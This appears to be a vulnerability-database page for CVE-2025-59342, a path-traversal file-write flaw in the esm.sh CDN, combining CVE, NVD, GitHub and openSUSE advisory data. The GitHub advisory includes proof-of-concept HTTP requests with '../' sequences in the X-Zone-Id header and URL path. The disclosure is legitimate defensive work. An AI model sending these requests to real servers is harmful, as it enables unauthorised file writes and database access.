CVE-2025-59342 (GCVE-0-2025-59342)
Vulnerability from cvelistv5 – Published: 2025-09-17 17:59 – Updated: 2026-01-14 15:52
VLAI
Title
esm.sh writes arbitrary files via path traversal in `X-Zone-Id` header
Summary
esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch.
Severity
CWE
- CWE-24 - Path Traversal: '../filedir'
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/esm-dev/esm.sh/security/adviso… | x_refsource_CONFIRM |
| https://github.com/esm-dev/esm.sh/commit/833a29f4… | x_refsource_MISC |
| https://github.com/esm-dev/esm.sh/blob/main/serve… | x_refsource_MISC |
| https://github.com/esm-dev/esm.sh/blob/main/serve… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-59342",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-17T18:19:55.260782Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-17T18:20:28.195Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "esm.sh",
"vendor": "esm-dev",
"versions": [
{
"status": "affected",
"version": "\u003c= 136"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-24",
"description": "CWE-24: Path Traversal: \u0027../filedir\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T15:52:09.174Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
},
{
"name": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"name": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"name": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
}
],
"source": {
"advisory": "GHSA-g2h5-cvvr-7gmw",
"discovery": "UNKNOWN"
},
"title": "esm.sh writes arbitrary files via path traversal in `X-Zone-Id` header"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-59342",
"datePublished": "2025-09-17T17:59:34.163Z",
"dateReserved": "2025-09-12T12:36:24.636Z",
"dateUpdated": "2026-01-14T15:52:09.174Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-59342",
"date": "2026-05-27",
"epss": "0.06448",
"percentile": "0.91182"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-59342\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-17T18:15:53.550\",\"lastModified\":\"2026-01-14T16:15:56.430\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch.\"},{\"lang\":\"es\",\"value\":\"esm.sh es una red de entrega de contenido (CDN) sin compilaci\u00f3n para el desarrollo web moderno. En 136 y anteriores, una falla de path traversal en el manejo del encabezado HTTP X-Zone-Id permite a un atacante hacer que la aplicaci\u00f3n escriba archivos fuera de la ubicaci\u00f3n de almacenamiento prevista. El valor del encabezado se utiliza para construir una ruta del sistema de archivos, pero no se canonicaliza correctamente ni se restringe al directorio base de almacenamiento de la aplicaci\u00f3n. Como resultado, suministrar secuencias ../ en X-Zone-Id hace que los archivos se escriban en directorios arbitrarios.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-24\"}]}],\"references\":[{\"url\":\"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-59342\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-17T18:19:55.260782Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-17T18:19:58.868Z\"}}], \"cna\": {\"title\": \"esm.sh writes arbitrary files via path traversal in `X-Zone-Id` header\", \"source\": {\"advisory\": \"GHSA-g2h5-cvvr-7gmw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"esm-dev\", \"product\": \"esm.sh\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 136\"}]}], \"references\": [{\"url\": \"https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw\", \"name\": \"https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151\", \"name\": \"https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116\", \"name\": \"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411\", \"name\": \"https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-24\", \"description\": \"CWE-24: Path Traversal: \u0027../filedir\u0027\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-14T15:52:09.174Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-59342\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-14T15:52:09.174Z\", \"dateReserved\": \"2025-09-12T12:36:24.636Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-17T17:59:34.163Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-59342
Vulnerability from fkie_nvd - Published: 2025-09-17 18:15 - Updated: 2026-04-15 00:35
Severity
Summary
esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch."
},
{
"lang": "es",
"value": "esm.sh es una red de entrega de contenido (CDN) sin compilaci\u00f3n para el desarrollo web moderno. En 136 y anteriores, una falla de path traversal en el manejo del encabezado HTTP X-Zone-Id permite a un atacante hacer que la aplicaci\u00f3n escriba archivos fuera de la ubicaci\u00f3n de almacenamiento prevista. El valor del encabezado se utiliza para construir una ruta del sistema de archivos, pero no se canonicaliza correctamente ni se restringe al directorio base de almacenamiento de la aplicaci\u00f3n. Como resultado, suministrar secuencias ../ en X-Zone-Id hace que los archivos se escriban en directorios arbitrarios."
}
],
"id": "CVE-2025-59342",
"lastModified": "2026-04-15T00:35:42.020",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-09-17T18:15:53.550",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-24"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-G2H5-CVVR-7GMW
Vulnerability from github – Published: 2025-09-17 19:03 – Updated: 2026-01-14 15:51
VLAI
Summary
esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header
Details
Summary
A path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories (example observed: ~/.esmd/modules/transform/<id>/ instead of ~/.esmd/storage/modules/transform).
Severity: Medium
Component / Endpoint:
POST /transform — handling of X-Zone-Id header
The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411
Impact: Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.
Proof of Concept (POC)
Request (attacker-supplied X-Zone-Id contains path traversal):
POST /transform HTTP/1.1
Host: localhost:8888
User-Agent: Den/8.7.1
Accept: */*
Connection: keep-alive
Referer: http://localhost:9999/
Content-Type: application/json
X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/
Content-Length: 325
{
"filename": "example2.js",
"lang": "js",
"code": "console.log('hello');",
"importMap": {
"imports": {
"react": "https://esm.sh/react",
"react-dom": "https://esm.sh/react-dom"
}
},
"jsxImportSource": "react",
"target": "es2022",
"sourceMap": "external",
"minify": true
}
Observed result: file written to ~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js instead of the intended ~/.esmd/storage/modules/transform/.
This can be trigger with another path traversal request below
GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1
Host: localhost:8888
User-Agent: localhost
Accept: */*
Connection: keep-alive
X-Zone-Id: ../
Referer: http://localhost:9999/
Remediation
Simply remove any .. in the X-Zone-Id header before actually process the file.
Credits
Severity
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 136"
},
"package": {
"ecosystem": "Go",
"name": "github.com/esm-dev/esm.sh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "136.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59342"
],
"database_specific": {
"cwe_ids": [
"CWE-24"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-17T19:03:05Z",
"nvd_published_at": "2025-09-17T18:15:53Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nA path-traversal flaw in the handling of the `X-Zone-Id` HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying `../` sequences in `X-Zone-Id` causes files to be written to arbitrary directories (example observed: `~/.esmd/modules/transform/\u003cid\u003e/` instead of `~/.esmd/storage/modules/transform`).\n\n**Severity:** Medium\n\n**Component / Endpoint:** \n\n`POST /transform` \u2014 handling of `X-Zone-Id` header\n\nThe vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411 \n\n**Impact:** Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.\n\n---\n\n## Proof of Concept (POC)\n\nRequest (attacker-supplied `X-Zone-Id` contains path traversal):\n\n```\nPOST /transform HTTP/1.1\nHost: localhost:8888\nUser-Agent: Den/8.7.1\nAccept: */*\nConnection: keep-alive\nReferer: http://localhost:9999/\nContent-Type: application/json\nX-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\nContent-Length: 325\n\n{\n \"filename\": \"example2.js\",\n \"lang\": \"js\",\n \"code\": \"console.log(\u0027hello\u0027);\",\n \"importMap\": {\n \"imports\": {\n \"react\": \"https://esm.sh/react\",\n \"react-dom\": \"https://esm.sh/react-dom\"\n }\n },\n \"jsxImportSource\": \"react\",\n \"target\": \"es2022\",\n \"sourceMap\": \"external\",\n \"minify\": true\n}\n```\n\u003cimg width=\"2496\" height=\"1214\" alt=\"Screenshot 2025-09-16 at 21 40 57\" src=\"https://github.com/user-attachments/assets/f878c3f0-5d7d-410c-97ac-20116f5496db\" /\u003e\n\n\nObserved result: file written to `~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js` instead of the intended `~/.esmd/storage/modules/transform/`.\n\nThis can be trigger with another path traversal request below\n\n```\nGET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1\nHost: localhost:8888\nUser-Agent: localhost\nAccept: */*\nConnection: keep-alive\nX-Zone-Id: ../\nReferer: http://localhost:9999/\n\n```\n\u003cimg width=\"2516\" height=\"710\" alt=\"Screenshot 2025-09-16 at 21 37 07\" src=\"https://github.com/user-attachments/assets/1fcfbed3-c1d2-4093-82d8-4afda225c685\" /\u003e\n\n---\n\n## Remediation\n\nSimply remove any .. in the `X-Zone-Id` header before actually process the file.\n\n## Credits\n\n- [Ai Ho (Jessie)](https://github.com/j3ssie)\n- [CL Yang](https://github.com/A11riseforme)",
"id": "GHSA-g2h5-cvvr-7gmw",
"modified": "2026-01-14T15:51:07Z",
"published": "2025-09-17T19:03:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59342"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"type": "PACKAGE",
"url": "https://github.com/esm-dev/esm.sh"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3967"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header"
}
OPENSUSE-SU-2025:15576-1
Vulnerability from csaf_opensuse - Published: 2025-09-25 00:00 - Updated: 2025-09-25 00:00Summary
govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media
Description of the patch: These are all security issues fixed in the govulncheck-vulndb-0.0.20250924T192141-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2025-15576
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
not set
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
not set
9.1 (Critical)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
5.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
low
5.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — |
Vendor Fix
|
|
